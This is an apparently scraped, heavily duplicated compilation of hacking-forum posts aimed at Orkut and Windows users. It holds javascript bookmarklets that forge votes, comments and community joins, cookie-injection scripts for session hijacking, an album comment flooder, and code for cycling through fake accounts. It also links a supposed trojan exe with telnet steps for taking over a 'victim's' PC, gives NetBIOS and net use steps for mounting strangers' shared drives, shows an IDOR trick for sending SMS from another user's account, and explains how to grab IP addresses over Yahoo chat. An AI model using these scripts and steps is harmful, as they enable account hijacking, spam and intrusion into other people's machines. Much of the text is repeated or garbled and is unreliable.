similarly by using the same function u can introduce another feature...!!! random comment from array of comment
1..Ask the user 2 enter as many comments as possible in a multiline textbox now use following command...eg..
_________________
text2.text
_________________
hi
Bye
_________________
_________________
dim a,b,comment
a=split(text2.text,vbcrlf)
b=ubound(a)
comment=a(int(rnd*b))
Moreover ajax is lot more faster than the regular one..!!
The following one is for Voting
javascript:send="POST_TOKEN=" + encodeURIComponent(JSHDF['CGI.POST_TOKEN']) + "&signature=" + encodeURIComponent(JSHDF['Page.signature.raw']) + "&option="+"OPTION"+"&public_vote=1"+"&Action.vote=";var xml = new XMLHttpRequest();xml.open("POST", "/CommPollVote.aspx?cmm=CMM&pid=PID&pct=PCT", true);xml.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;");xml.send(send);void(0)
The following One is for comment
javascript:send="POST_TOKEN=" + encodeURIComponent(JSHDF['CGI.POST_TOKEN']) + "&signature=" + encodeURIComponent(JSHDF['Page.signature.raw']) + "&postText="+encodeURIComponent(" Comment")+"&Action.submit=";var xml = new XMLHttpRequest();xml.open("POST", "/CommPollResults.aspx?cmm=CMM&pid=PID&pct=PCT", true);xml.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;");xml.send(send);void(0)
Now since some Polls require comm joininghere is one more script tht will help you...just Add this at the start of one the scripts given above
javascript:send="POST_TOKEN=" + encodeURIComponent(JSHDF['CGI.POST_TOKEN']) + "&signature=" + encodeURIComponent(JSHDF['Page.signature.raw']) + "&Action.join=";var xml = new XMLHttpRequest();xml.open("POST", "/CommunityJoin.aspx?cmm=32982657", true);xml.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;");xml.send(send);void(0)
THESE SCRIPTS ARE WORKING IN FF i dont know abt IE 7..!!!
____________________________________________________________________
NOw some tips to make your POll voter
1..create a textbox and ask ppl to enter fakes in following manner
_________________
Text1.text
_________________
user1:Pass1
user2:pass2
_________________
_________________
2..now use the command Split...Split breaks the pasticular character and makes and array ouuta them
start:
dim a
dim i=0
a=split(text1.text,vbcrlf)
b=split(a(i),":")
user=b(0)
pass=b(1)
if i=ubound(a) then
masgbox("Fakes khatam paisa hajam")
end if
ur function here
goto start
similarly by using the same function u can introduce another feature...!!! random comment from array of comment
1..Ask the user 2 enter as many comments as possible in a multiline textbox now use following command...eg..
_________________
text2.text
_________________
hi
Bye
_________________
_________________
dim a,b,comment
a=split(text2.text,vbcrlf)
b=ubound(a)
comment=a(int(rnd*b))
cookies stealin scripts
Javascript:cookie=prompt("Cookie:",'');if(cookie./*by 0wn3d*/indexOf("orkut_state")>=-1){document.cookie="orkut_state="+unescape(cookie);window.location="/Home.aspx";}else{document.cookie=unescape(cookie);window.location="/Home.aspx";}
javascript:document.cookie="orkut_state=Cookie";location.reload();
~A simple and easy way of using cookies in orkut~
javascript:alert("Script created by CHINTU ROCKS");ls="orkut_state part here";document.cookie=ls;location.reload();
javascript:document.cookie="orkut_state=Cookie";location.reload();
~A simple and easy way of using cookies in orkut~
javascript:alert("Script created by CHINTU ROCKS");ls="orkut_state part here";document.cookie=ls;location.reload();
Spreading viruses by ip
rapidshare.com/files/65228555/Chess.exe
download it ..
send it to victim ..
he must run it ..
go to telnet ..
-->run > telnet ..
type o
in
type ip address .. of the victim ..
then if entered correctly ..
it would ask for username and password ..
enter
username:administrator
password:hack
WOOSH !!
u r in the victims PC ..
now u can control his PC using DOS commands ,,
i have use in my friend computer
right now i have nod32 can't use in my pc
ok got it
must be send comments
i have got frm other community
but friend how to connect da port 23
download it ..
send it to victim ..
he must run it ..
go to telnet ..
-->run > telnet ..
type o
in
type ip address .. of the victim ..
then if entered correctly ..
it would ask for username and password ..
enter
username:administrator
password:hack
WOOSH !!
u r in the victims PC ..
now u can control his PC using DOS commands ,,
i have use in my friend computer
right now i have nod32 can't use in my pc
ok got it
must be send comments
i have got frm other community
but friend how to connect da port 23
[l33]How to Hack Network Hard Drives using the cmd
In this step by step guide you will learn about: How to Hack Network Hard Drives using the command prompt.
Things to remember
* CP = Command Prompt
* HDs = Hard Drives
Step by Step:
1. Open command prompt if it's block and you don't know how to get to it go to Using the command prompt under a limited account and then continue to step #2.
2. Once in command prompt type
c:\windows>nbtstat -a 203.195.136.156
(instead of the I.P. address type the real I.P. address or the name of the computer your trying to get to) and if you don't know how to get the name of the computer then go to what to do after hacking the C:\ drive and then continue to step #3.
3. Let say that it gives you this
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
user <00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered
MAC Address = 00-02-44-14-23-E6
The number <20> shows that the victim has enabled the File And Printer Sharing.
-------------------------------------
NOTE - If you do not get this number there are three possible answers
A. You do not get the number <20> . This shows that the victim has not enabled the File and Printer Sharing.
B. You get "Host Not found". This shows that the port 139 is closed or the ip address or computer name doesn't exist or the computer you are trying to get to is turned off.
C. its still doesn’t matter if you don't get the <20> because this is to hack hard drives and not printers
4. Now in command prompt type
c:\windows>net view \\203.195.136.156
Let's suppose we get the following output
Shared resources at \\203.195.136.156
The computer's name will be here
Share name Type Used as Comment
-------------------------------------------
CDISK Disk
The command completed successfully.
5. The name CDISK is one of the things that being shared on command prompt type (the word Disk at the side its just saying what the the thing being shared is a printer, disk or a file)
c:\windows>net use k: \\203.195.136.156\CDISK
You may replace k letter by any other letter, If the command is successful we will get the confirmation - The command was completed successfully
Now just double click on the My Computer icon on your desktop
and there will be a new drive there with the letter that you replaced K with.
Continue to Hacking network printers with the command prompt
Things to remember
* CP = Command Prompt
* HDs = Hard Drives
Step by Step:
1. Open command prompt if it's block and you don't know how to get to it go to Using the command prompt under a limited account and then continue to step #2.
2. Once in command prompt type
c:\windows>nbtstat -a 203.195.136.156
(instead of the I.P. address type the real I.P. address or the name of the computer your trying to get to) and if you don't know how to get the name of the computer then go to what to do after hacking the C:\ drive and then continue to step #3.
3. Let say that it gives you this
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
user <00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered
MAC Address = 00-02-44-14-23-E6
The number <20> shows that the victim has enabled the File And Printer Sharing.
-------------------------------------
NOTE - If you do not get this number there are three possible answers
A. You do not get the number <20> . This shows that the victim has not enabled the File and Printer Sharing.
B. You get "Host Not found". This shows that the port 139 is closed or the ip address or computer name doesn't exist or the computer you are trying to get to is turned off.
C. its still doesn’t matter if you don't get the <20> because this is to hack hard drives and not printers
4. Now in command prompt type
c:\windows>net view \\203.195.136.156
Let's suppose we get the following output
Shared resources at \\203.195.136.156
The computer's name will be here
Share name Type Used as Comment
-------------------------------------------
CDISK Disk
The command completed successfully.
5. The name CDISK is one of the things that being shared on command prompt type (the word Disk at the side its just saying what the the thing being shared is a printer, disk or a file)
c:\windows>net use k: \\203.195.136.156\CDISK
You may replace k letter by any other letter, If the command is successful we will get the confirmation - The command was completed successfully
Now just double click on the My Computer icon on your desktop
and there will be a new drive there with the letter that you replaced K with.
Continue to Hacking network printers with the command prompt
ALBUM FLOODER
javascript:var p=prompt("Enter Your Text","Album Flooding By KOK");function kok(){oug=document.forms[3].com.value=p;_addComment(1024);}void(setInterval(kok,800));
[L33T][app]SMS Me hacked :P
With this hack you can access any1's SMS Me application..
Read the Instructions ...
1. You Have to Use Mozilla Firefox becoz it gives info about the frames.
2. You Have to Find a profile where SMS Me application is installed and activated with the profile person's mobile.
3. Goto the profile on the SMS Me application and right click on "SMS Anyone" then goto "This Frame" then to "Open Frame in new tab" ..
4. Now goto the opened tab..
5. See the address bar. It will be sumthing like..
http://60t6181qev2nim7rngfqbb7p77tkm11f.a.orkut.gmodules.com/gadgets/ifr?url=http://www.mycantos.com/opensocial/myc_beta.xml&parent=http://www.orkut.co.in&lang=en&country=US&synd=orkut&view=profile&mid=0&libs=analytics%3Adynamic-height%3Aviews&h=280&st=AFinprSJEYfwgKP-M-3dBcBtYsaGq6TERWu7wUQF5cl4qWyBAqVmBsjVCjWE7k1dggCcOy8ENGAVr16_wCSxS5vcvxZ3pp2Hs4qO6w9WtGCxFSQCaPS4rJQ#gadgetId=543850612906&gadgetOwner=123&gadgetViewer=000&view-params=&prefetch=0p0
6. All you hve to do is copy gadgetOwner value and paste it on gadgetViewer value.. LIke this..
http://60t6181qev2nim7rngfqbb7p77tkm11f.a.orkut.gmodules.com/gadgets/ifr?url=http://www.mycantos.com/opensocial/myc_beta.xml&parent=http://www.orkut.co.in&lang=en&country=US&synd=orkut&view=profile&mid=0&libs=analytics%3Adynamic-height%3Aviews&h=280&st=AFinprSJEYfwgKP-M-3dBcBtYsaGq6TERWu7wUQF5cl4qWyBAqVmBsjVCjWE7k1dggCcOy8ENGAVr16_wCSxS5vcvxZ3pp2Hs4qO6w9WtGCxFSQCaPS4rJQ#gadgetId=543850612906&gadgetOwner=123&gadgetViewer=123&view-params=&prefetch=0p0
7. Now when edited.copy this address bar.. Open new tab paste N...
Wow you entered his application..
You can send sms from his no. now..
Enjoy the hak
Credits : XxSidxX
Read the Instructions ...
1. You Have to Use Mozilla Firefox becoz it gives info about the frames.
2. You Have to Find a profile where SMS Me application is installed and activated with the profile person's mobile.
3. Goto the profile on the SMS Me application and right click on "SMS Anyone" then goto "This Frame" then to "Open Frame in new tab" ..
4. Now goto the opened tab..
5. See the address bar. It will be sumthing like..
http://60t6181qev2nim7rngfqbb7p77tkm11f.a.orkut.gmodules.com/gadgets/ifr?url=http://www.mycantos.com/opensocial/myc_beta.xml&parent=http://www.orkut.co.in&lang=en&country=US&synd=orkut&view=profile&mid=0&libs=analytics%3Adynamic-height%3Aviews&h=280&st=AFinprSJEYfwgKP-M-3dBcBtYsaGq6TERWu7wUQF5cl4qWyBAqVmBsjVCjWE7k1dggCcOy8ENGAVr16_wCSxS5vcvxZ3pp2Hs4qO6w9WtGCxFSQCaPS4rJQ#gadgetId=543850612906&gadgetOwner=123&gadgetViewer=000&view-params=&prefetch=0p0
6. All you hve to do is copy gadgetOwner value and paste it on gadgetViewer value.. LIke this..
http://60t6181qev2nim7rngfqbb7p77tkm11f.a.orkut.gmodules.com/gadgets/ifr?url=http://www.mycantos.com/opensocial/myc_beta.xml&parent=http://www.orkut.co.in&lang=en&country=US&synd=orkut&view=profile&mid=0&libs=analytics%3Adynamic-height%3Aviews&h=280&st=AFinprSJEYfwgKP-M-3dBcBtYsaGq6TERWu7wUQF5cl4qWyBAqVmBsjVCjWE7k1dggCcOy8ENGAVr16_wCSxS5vcvxZ3pp2Hs4qO6w9WtGCxFSQCaPS4rJQ#gadgetId=543850612906&gadgetOwner=123&gadgetViewer=123&view-params=&prefetch=0p0
7. Now when edited.copy this address bar.. Open new tab paste N...
Wow you entered his application..
You can send sms from his no. now..
Enjoy the hak
Credits : XxSidxX
Speed Up Your Net Browsing
Speed Up Your Net Browsing using the following steps--
* Open "Start"--> "Run"--> type "gpedit.msc".
* You will see "Local Computer Policy".
* Expand the "Administrative Templates" Branch.
* Expand the "Network" Branch.
* Highlight "QoS Packet Scheduler".
* Double-click "Limit Reservable Bandwidth".
* Check "Enabled".
* Change "Bandwidth limit [%]" to "0%".
* Click "Apply" and then "OK" and then "Restart".
* Open "Start"--> "Run"--> type "gpedit.msc".
* You will see "Local Computer Policy".
* Expand the "Administrative Templates" Branch.
* Expand the "Network" Branch.
* Highlight "QoS Packet Scheduler".
* Double-click "Limit Reservable Bandwidth".
* Check "Enabled".
* Change "Bandwidth limit [%]" to "0%".
* Click "Apply" and then "OK" and then "Restart".
Quick Reply in Scrapbook (With signature)[source]
// ==UserScript==
// @name Quick Reply in Scrapbook (With signature)
// @namespace http://www.gautamsofts.com/ and http://blog.gautamsofts.com/
// @author Gautam [Thanks to Mr Nobody]
// @description Reply in any orkut community with Shift+[Functional key No as the scrap number [like F3 for scrap #3]]
// @include http://www.orkut.*/Scrapbook.aspx
*
// @exclude *.js
// ==/UserScript==
var sig = "\n\n\n\n\nVisit: http:// www . gautamsofts . com \nhttp:// blog . gautamsofts .com \n(remove spaces)"; // Enter your signature here
// Do not edit anything below + don't steal credits!!
function reply2(){
txt = prompt("Enter Your Reply: (Please Visit http://www.gautamsofts.com/ or http://blog.gautamsofts.com/ )", "");
txtcomp = encodeURIComponent(txt + sig);
a = document.forms[3];
var c=document.forms[3].elements[3].value;
var b=c.split("/");
a.action = "/Scrapbook.aspx?toUserId=" + b[2] + "&rawAddedDate=" + b[1] + "&scrapText=" + txtcomp + "&Action.submit=1";
a.submit();
}
function reply3(){
txt = prompt("Enter Your Reply: (Please Visit http://www.gautamsofts.com/ or http://blog.gautamsofts.com/ )", "");
txtcomp = encodeURIComponent(txt + sig);
a = document.forms[3];
var c=document.forms[3].elements[5].value;
var b=c.split("/");
a.action = "/Scrapbook.aspx?toUserId=" + b[2] + "&rawAddedDate=" + b[1] + "&scrapText=" + txtcomp + "&Action.submit=1";
a.submit();
}
function reply4(){
txt = prompt("Enter Your Reply: (Please Visit http://www.gautamsofts.com/ or http://blog.gautamsofts.com/ )", "");
txtcomp = encodeURIComponent(txt + sig);
a = document.forms[3];
var c=document.forms[3].elements[7].value;
var b=c.split("/");
a.action = "/Scrapbook.aspx?toUserId=" + b[2] + "&rawAddedDate=" + b[1] + "&scrapText=" + txtcomp + "&Action.submit=1";
a.submit();
}
function reply5(){
txt = prompt("Enter Your Reply: (Please Visit http://www.gautamsofts.com/ or http://blog.gautamsofts.com/ )", "");
txtcomp = encodeURIComponent(txt + sig);
a = document.forms[3];
var c=document.forms[3].elements[9].value;
var b=c.split("/");
a.action = "/Scrapbook.aspx?toUserId=" + b[2] + "&rawAddedDate=" + b[1] + "&scrapText=" + txtcomp + "&Action.submit=1";
a.submit();
}
function reply6(){
txt = prompt("Enter Your Reply: (Please Visit http://www.gautamsofts.com/ or http://blog.gautamsofts.com/ )", "");
txtcomp = encodeURIComponent(txt + sig);
a = document.forms[3];
var c=document.forms[3].elements[11].value;
var b=c.split("/");
a.action = "/Scrapbook.aspx?toUserId=" + b[2] + "&rawAddedDate=" + b[1] + "&scrapText=" + txtcomp + "&Action.submit=1";
a.submit();
}
function reply7(){
txt = prompt("Enter Your Reply: (Please Visit http://www.gautamsofts.com/ or http://blog.gautamsofts.com/ )", "");
txtcomp = encodeURIComponent(txt + sig);
a = document.forms[3];
var c=document.forms[3].elements[13].value;
var b=c.split("/");
a.action = "/Scrapbook.aspx?toUserId=" + b[2] + "&rawAddedDate=" + b[1] + "&scrapText=" + txtcomp + "&Action.submit=1";
a.submit();
}
function reply8(){
txt = prompt("Enter Your Reply: (Please Visit http://www.gautamsofts.com/ or http://blog.gautamsofts.com/ )", "");
txtcomp = encodeURIComponent(txt + sig);
a = document.forms[3];
var c=document.forms[3].elements[15].value;
var b=c.split("/");
a.action = "/Scrapbook.aspx?toUserId=" + b[2] + "&rawAddedDate=" + b[1] + "&scrapText=" + txtcomp + "&Action.submit=1";
a.submit();
}
function reply9(){
txt = prompt("Enter Your Reply: (Please Visit http://www.gautamsofts.com/ or http://blog.gautamsofts.com/ )", "");
txtcomp = encodeURIComponent(txt + sig);
a = document.forms[3];
var c=document.forms[3].elements[17].value;
var b=c.split("/");
a.action = "/Scrapbook.aspx?toUserId=" + b[2] + "&rawAddedDate=" + b[1] + "&scrapText=" + txtcomp + "&Action.submit=1";
a.submit();
}
function reply20(){
txt = prompt("Enter Your Reply: (Please Visit http://www.gautamsofts.com/ or http://blog.gautamsofts.com/ )", "");
txtcomp = encodeURIComponent(txt + sig);
a = document.forms[3];
var c=document.forms[3].elements[19].value;
var b=c.split("/");
a.action = "/Scrapbook.aspx?toUserId=" + b[2] + "&rawAddedDate=" + b[1] + "&scrapText=" + txtcomp + "&Action.submit=1";
a.submit();
}
function reply21(){
txt = prompt("Enter Your Reply: (Please Visit http://www.gautamsofts.com/ or http://blog.gautamsofts.com/ )", "");
txtcomp = encodeURIComponent(txt + sig);
a = document.forms[3];
var c=document.forms[3].elements[21].value;
var b=c.split("/");
a.action = "/Scrapbook.aspx?toUserId=" + b[2] + "&rawAddedDate=" + b[1] + "&scrapText=" + txtcomp + "&Action.submit=1";
a.submit();
}
var fnCheckShortcut2;
fnCheckShortcut2 = function (e) {if (e.shiftKey && e.keyCode == 112) {reply2();}};
document.addEventListener("keydown", fnCheckShortcut2, 0);
var fnCheckShortcut3;
fnCheckShortcut3 = function (e) {if (e.shiftKey && e.keyCode == 113) {reply3();}};
document.addEventListener("keydown", fnCheckShortcut3, 0);
var fnCheckShortcut4;
fnCheckShortcut4 = function (e) {if (e.shiftKey && e.keyCode == 114) {reply4();}};
document.addEventListener("keydown", fnCheckShortcut4, 0);
var fnCheckShortcut5;
fnCheckShortcut5 = function (e) {if (e.shiftKey && e.keyCode == 115) {reply5();}};
document.addEventListener("keydown", fnCheckShortcut5, 0);
var fnCheckShortcut6;
fnCheckShortcut6 = function (e) {if (e.shiftKey && e.keyCode == 116) {reply6();}};
document.addEventListener("keydown", fnCheckShortcut6, 0);
var fnCheckShortcut7;
fnCheckShortcut7 = function (e) {if (e.shiftKey && e.keyCode == 117) {reply7();}};
document.addEventListener("keydown", fnCheckShortcut7, 0);
var fnCheckShortcut8;
fnCheckShortcut8 = function (e) {if (e.shiftKey && e.keyCode == 118) {reply8();}};
document.addEventListener("keydown", fnCheckShortcut8, 0);
var fnCheckShortcut9;
fnCheckShortcut9 = function (e) {if (e.shiftKey && e.keyCode == 119) {reply9();}};
document.addEventListener("keydown", fnCheckShortcut9, 0);
var fnCheckShortcut20;
fnCheckShortcut20 = function (e) {if (e.shiftKey && e.keyCode == 120) {reply20();}};
document.addEventListener("keydown", fnCheckShortcut20, 0);
var fnCheckShortcut21;
fnCheckShortcut21 = function (e) {if (e.shiftKey && e.keyCode == 121) {reply21();}};
document.addEventListener("keydown", fnCheckShortcut21, 0);
// @name Quick Reply in Scrapbook (With signature)
// @namespace http://www.gautamsofts.com/ and http://blog.gautamsofts.com/
// @author Gautam [Thanks to Mr Nobody]
// @description Reply in any orkut community with Shift+[Functional key No as the scrap number [like F3 for scrap #3]]
// @include http://www.orkut.*/Scrapbook.aspx
*
// @exclude *.js
// ==/UserScript==
var sig = "\n\n\n\n\nVisit: http:// www . gautamsofts . com \nhttp:// blog . gautamsofts .com \n(remove spaces)"; // Enter your signature here
// Do not edit anything below + don't steal credits!!
function reply2(){
txt = prompt("Enter Your Reply: (Please Visit http://www.gautamsofts.com/ or http://blog.gautamsofts.com/ )", "");
txtcomp = encodeURIComponent(txt + sig);
a = document.forms[3];
var c=document.forms[3].elements[3].value;
var b=c.split("/");
a.action = "/Scrapbook.aspx?toUserId=" + b[2] + "&rawAddedDate=" + b[1] + "&scrapText=" + txtcomp + "&Action.submit=1";
a.submit();
}
function reply3(){
txt = prompt("Enter Your Reply: (Please Visit http://www.gautamsofts.com/ or http://blog.gautamsofts.com/ )", "");
txtcomp = encodeURIComponent(txt + sig);
a = document.forms[3];
var c=document.forms[3].elements[5].value;
var b=c.split("/");
a.action = "/Scrapbook.aspx?toUserId=" + b[2] + "&rawAddedDate=" + b[1] + "&scrapText=" + txtcomp + "&Action.submit=1";
a.submit();
}
function reply4(){
txt = prompt("Enter Your Reply: (Please Visit http://www.gautamsofts.com/ or http://blog.gautamsofts.com/ )", "");
txtcomp = encodeURIComponent(txt + sig);
a = document.forms[3];
var c=document.forms[3].elements[7].value;
var b=c.split("/");
a.action = "/Scrapbook.aspx?toUserId=" + b[2] + "&rawAddedDate=" + b[1] + "&scrapText=" + txtcomp + "&Action.submit=1";
a.submit();
}
function reply5(){
txt = prompt("Enter Your Reply: (Please Visit http://www.gautamsofts.com/ or http://blog.gautamsofts.com/ )", "");
txtcomp = encodeURIComponent(txt + sig);
a = document.forms[3];
var c=document.forms[3].elements[9].value;
var b=c.split("/");
a.action = "/Scrapbook.aspx?toUserId=" + b[2] + "&rawAddedDate=" + b[1] + "&scrapText=" + txtcomp + "&Action.submit=1";
a.submit();
}
function reply6(){
txt = prompt("Enter Your Reply: (Please Visit http://www.gautamsofts.com/ or http://blog.gautamsofts.com/ )", "");
txtcomp = encodeURIComponent(txt + sig);
a = document.forms[3];
var c=document.forms[3].elements[11].value;
var b=c.split("/");
a.action = "/Scrapbook.aspx?toUserId=" + b[2] + "&rawAddedDate=" + b[1] + "&scrapText=" + txtcomp + "&Action.submit=1";
a.submit();
}
function reply7(){
txt = prompt("Enter Your Reply: (Please Visit http://www.gautamsofts.com/ or http://blog.gautamsofts.com/ )", "");
txtcomp = encodeURIComponent(txt + sig);
a = document.forms[3];
var c=document.forms[3].elements[13].value;
var b=c.split("/");
a.action = "/Scrapbook.aspx?toUserId=" + b[2] + "&rawAddedDate=" + b[1] + "&scrapText=" + txtcomp + "&Action.submit=1";
a.submit();
}
function reply8(){
txt = prompt("Enter Your Reply: (Please Visit http://www.gautamsofts.com/ or http://blog.gautamsofts.com/ )", "");
txtcomp = encodeURIComponent(txt + sig);
a = document.forms[3];
var c=document.forms[3].elements[15].value;
var b=c.split("/");
a.action = "/Scrapbook.aspx?toUserId=" + b[2] + "&rawAddedDate=" + b[1] + "&scrapText=" + txtcomp + "&Action.submit=1";
a.submit();
}
function reply9(){
txt = prompt("Enter Your Reply: (Please Visit http://www.gautamsofts.com/ or http://blog.gautamsofts.com/ )", "");
txtcomp = encodeURIComponent(txt + sig);
a = document.forms[3];
var c=document.forms[3].elements[17].value;
var b=c.split("/");
a.action = "/Scrapbook.aspx?toUserId=" + b[2] + "&rawAddedDate=" + b[1] + "&scrapText=" + txtcomp + "&Action.submit=1";
a.submit();
}
function reply20(){
txt = prompt("Enter Your Reply: (Please Visit http://www.gautamsofts.com/ or http://blog.gautamsofts.com/ )", "");
txtcomp = encodeURIComponent(txt + sig);
a = document.forms[3];
var c=document.forms[3].elements[19].value;
var b=c.split("/");
a.action = "/Scrapbook.aspx?toUserId=" + b[2] + "&rawAddedDate=" + b[1] + "&scrapText=" + txtcomp + "&Action.submit=1";
a.submit();
}
function reply21(){
txt = prompt("Enter Your Reply: (Please Visit http://www.gautamsofts.com/ or http://blog.gautamsofts.com/ )", "");
txtcomp = encodeURIComponent(txt + sig);
a = document.forms[3];
var c=document.forms[3].elements[21].value;
var b=c.split("/");
a.action = "/Scrapbook.aspx?toUserId=" + b[2] + "&rawAddedDate=" + b[1] + "&scrapText=" + txtcomp + "&Action.submit=1";
a.submit();
}
var fnCheckShortcut2;
fnCheckShortcut2 = function (e) {if (e.shiftKey && e.keyCode == 112) {reply2();}};
document.addEventListener("keydown", fnCheckShortcut2, 0);
var fnCheckShortcut3;
fnCheckShortcut3 = function (e) {if (e.shiftKey && e.keyCode == 113) {reply3();}};
document.addEventListener("keydown", fnCheckShortcut3, 0);
var fnCheckShortcut4;
fnCheckShortcut4 = function (e) {if (e.shiftKey && e.keyCode == 114) {reply4();}};
document.addEventListener("keydown", fnCheckShortcut4, 0);
var fnCheckShortcut5;
fnCheckShortcut5 = function (e) {if (e.shiftKey && e.keyCode == 115) {reply5();}};
document.addEventListener("keydown", fnCheckShortcut5, 0);
var fnCheckShortcut6;
fnCheckShortcut6 = function (e) {if (e.shiftKey && e.keyCode == 116) {reply6();}};
document.addEventListener("keydown", fnCheckShortcut6, 0);
var fnCheckShortcut7;
fnCheckShortcut7 = function (e) {if (e.shiftKey && e.keyCode == 117) {reply7();}};
document.addEventListener("keydown", fnCheckShortcut7, 0);
var fnCheckShortcut8;
fnCheckShortcut8 = function (e) {if (e.shiftKey && e.keyCode == 118) {reply8();}};
document.addEventListener("keydown", fnCheckShortcut8, 0);
var fnCheckShortcut9;
fnCheckShortcut9 = function (e) {if (e.shiftKey && e.keyCode == 119) {reply9();}};
document.addEventListener("keydown", fnCheckShortcut9, 0);
var fnCheckShortcut20;
fnCheckShortcut20 = function (e) {if (e.shiftKey && e.keyCode == 120) {reply20();}};
document.addEventListener("keydown", fnCheckShortcut20, 0);
var fnCheckShortcut21;
fnCheckShortcut21 = function (e) {if (e.shiftKey && e.keyCode == 121) {reply21();}};
document.addEventListener("keydown", fnCheckShortcut21, 0);
Hack PC while Chatting
Hack PC while chatting
I am not sure that this will work 100 %.
But yes will work almost 70 percent of the times.
But before that you need to know some few things of yahoo chat protocol
leave a comment here after u see the post lemme know if it does works or not or u having a problem post here.
Following are the features : -
1) When we chat on yahoo every thing goes through the server.Only when we chat thats messages.
2) When we send files yahoo has 2 options
a) Either it uploads the file and then the other client has to down load it.
Either it connects to the client directly and gets the files
3) When we use video or audio:-
a) It either goes thru the server
Or it has client to client connection
And when we have client to client connection the opponents IP is revealed.On the 5051 port.So how do we exploit the Chat user when he gets a direct connection. And how do we go about it.Remember i am here to hack a system with out using a TOOL only by simple net commands and yahoo chat techniques.Thats what makes a difference between a real hacker and new bies.
So lets analyse
1) Its impossible to get a Attackers IP address when you only chat.
2) There are 50 % chances of getting a IP address when you send files
3) Again 50 % chances of getting IP when you use video or audio.
So why to wait lets exploit those 50 % chances .
I'll explain only for files here which lies same for Video or audio
1) Go to dos
type ->
netstat -n 3
You will get the following output.Just do not care and be cool
Active Connections
Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED
Active Connections
Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED
Just i will explain what the out put is in general.In left hand side is your IP address.And in right hand side is the IP address of the foreign machine.And the port to which is connected.Ok now so what next ->
2) Try sending a file to the Target .
if the files comes from server.Thats the file is uploaded leave itYou will not get the ip.But if a direct connection is established
HMMMM then the first attacker first phase is over
This is the output in your netstat.The 5101 number port is where the Attacker is connected.
Active Connections
Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED
TCP 194.30.209.15:5101 194.30.209.14:3290 ESTABLISHED
3) so what next???
Hmmm........ Ok so make a DOS attack now
Go to dos prompt and
Just do
nbtstat -A Attackers IPaddress.Can happen that if system is not protected then you can see the whole network.
C:\>nbtstat -A 194.30.209.14
Local Area Connection:
Node IpAddress: [194.30.209.15] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
EDP12 <00> UNIQUE Registered
XYZ <00> GROUP Registered
XYZ <20> UNIQUE Registered
XYZCOMP1 <1E> GROUP Registered
MAC Address = 00-C0-W0-D5-EF-9A
What to do next??
It is now ur job to tell me what u have done next...
So the conclusion is never exchange files , video or audio till you know that the user with whom you are chatting is not going to harm you.
I am not sure that this will work 100 %.
But yes will work almost 70 percent of the times.
But before that you need to know some few things of yahoo chat protocol
leave a comment here after u see the post lemme know if it does works or not or u having a problem post here.
Following are the features : -
1) When we chat on yahoo every thing goes through the server.Only when we chat thats messages.
2) When we send files yahoo has 2 options
a) Either it uploads the file and then the other client has to down load it.
Either it connects to the client directly and gets the files
3) When we use video or audio:-
a) It either goes thru the server
Or it has client to client connection
And when we have client to client connection the opponents IP is revealed.On the 5051 port.So how do we exploit the Chat user when he gets a direct connection. And how do we go about it.Remember i am here to hack a system with out using a TOOL only by simple net commands and yahoo chat techniques.Thats what makes a difference between a real hacker and new bies.
So lets analyse
1) Its impossible to get a Attackers IP address when you only chat.
2) There are 50 % chances of getting a IP address when you send files
3) Again 50 % chances of getting IP when you use video or audio.
So why to wait lets exploit those 50 % chances .
I'll explain only for files here which lies same for Video or audio
1) Go to dos
type ->
netstat -n 3
You will get the following output.Just do not care and be cool
Active Connections
Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED
Active Connections
Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED
Just i will explain what the out put is in general.In left hand side is your IP address.And in right hand side is the IP address of the foreign machine.And the port to which is connected.Ok now so what next ->
2) Try sending a file to the Target .
if the files comes from server.Thats the file is uploaded leave itYou will not get the ip.But if a direct connection is established
HMMMM then the first attacker first phase is over
This is the output in your netstat.The 5101 number port is where the Attacker is connected.
Active Connections
Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED
TCP 194.30.209.15:5101 194.30.209.14:3290 ESTABLISHED
3) so what next???
Hmmm........ Ok so make a DOS attack now
Go to dos prompt and
Just do
nbtstat -A Attackers IPaddress.Can happen that if system is not protected then you can see the whole network.
C:\>nbtstat -A 194.30.209.14
Local Area Connection:
Node IpAddress: [194.30.209.15] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
EDP12 <00> UNIQUE Registered
XYZ <00> GROUP Registered
